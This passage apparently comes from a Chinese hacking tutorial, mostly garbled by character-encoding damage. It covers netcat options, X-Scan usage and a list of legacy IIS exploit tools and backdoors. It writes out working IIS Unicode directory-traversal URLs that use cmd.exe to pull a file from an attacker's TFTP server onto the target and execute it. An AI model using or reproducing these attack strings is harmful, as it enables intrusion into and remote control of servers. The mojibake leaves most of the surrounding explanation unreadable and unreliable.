-r ָؼԶ̶˿ 

-s addr Դַ 

-u UDPģʽ 

-v ϸ  -vɵõϸ 

-w secs timeoutʱ 

-z ص  ɨʱ 

ˡTFTPD32.EXE 

ԼĵʱΪһ̨FTP⼦ļtftpҪ⼦ִУͨҪUnicode©telnet⼦磺 

http://IPַ/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i IPַ get ļ c:\winnt\system32\ļ 

ȻֱļУ 

http://IPַ/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+ļ 

šprihack.exeIISprinterԶ̻ߡidqover.exeidqģѡ һ˿ڼ Ȼtelnetļ˿ڣɹһĶ˿ڣ󶨵ִСxploit.exeһͼνidaɹԺwinxpҪwinxp 

һntis.execmd.execmdasp.aspcgi-backdoorexeҪŵcgi-binĿ¼£aspŵASPִȨ޵Ŀ¼ȻIEӡ 

һһ Xscanв˵ 

ڼУ" [ո]" Բ鿴߳״̬ɨȣ" q" 浱ǰݺǰ˳򣬰" " ǿйرճ 

1.ʽ: xscan -host [-] [ѡ] 

xscan -file [ѡ] 

 : 

-port : ⳣ÷Ķ˿״̬(ͨ\dat\config.iniļ" PORT-SCAN-OPTIONS\PORT-LIST" ƴ˿б) 

-ftp : FTP(ͨ\dat\config.iniļû/ֵļ) 

-ntpass : NT-Server(ͨ\dat\config.iniļû/ֵļ) 

-cgi : CGI©(ͨ\dat\config.iniļ" CGI-ENCODE\encode_type" ñ뷽) 

-iis : IIS©(ͨ\dat\config.iniļ" CGI-ENCODE\encode_type" ñ뷽) 

[ѡ] : 

-v: ʾϸɨ 

-p: Pingͨ 

-o: ûм⵽Ŷ˿ڵ 

-t : ָ󲢷߳Ͳ, ĬΪ100,10
 
